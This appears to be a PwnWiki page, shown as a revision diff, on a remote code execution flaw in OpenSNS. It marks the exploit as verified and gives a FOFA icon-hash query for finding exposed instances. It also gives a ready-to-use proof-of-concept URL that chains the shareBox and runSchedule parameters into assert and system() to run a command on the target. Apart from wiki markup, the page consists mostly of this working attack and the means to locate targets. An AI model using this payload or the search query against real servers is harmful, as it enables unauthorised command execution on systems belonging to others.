Difference between revisions of "OpenSNS 遠程代碼執行漏洞"

From PwnWiki
(Created page with "{| style="margin: auto; width: 750px;color:green;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | valig...")
 
(Marked this version for translation)
 
Line 12: Line 12:
 
<languages />
 
<languages />
 
<translate>
 
<translate>
==漏洞影響==
+
==漏洞影響== <!--T:1-->
 
</translate>
 
</translate>
 
OpenSNS
 
OpenSNS
  
 
<translate>
 
<translate>
 +
<!--T:2-->
 
經過測試,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。
 
經過測試,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。
 
</translate>
 
</translate>

Latest revision as of 10:24, 28 June 2021

Check.png 該漏洞已通過驗證。
本頁面的EXP/POC/Payload經測試可用,漏洞已經成功復現。


Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影響

OpenSNS

經過測試,在Uploads_Download_2020-05-14_5ebca066a3fef版本成功利用。

FOFA

icon_hash="1167011145"

POC

http://<target>/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=system(ipconfig)
Retrieved from "https://pwnwiki.com/index.php?title=OpenSNS_遠程代碼執行漏洞&oldid=6006"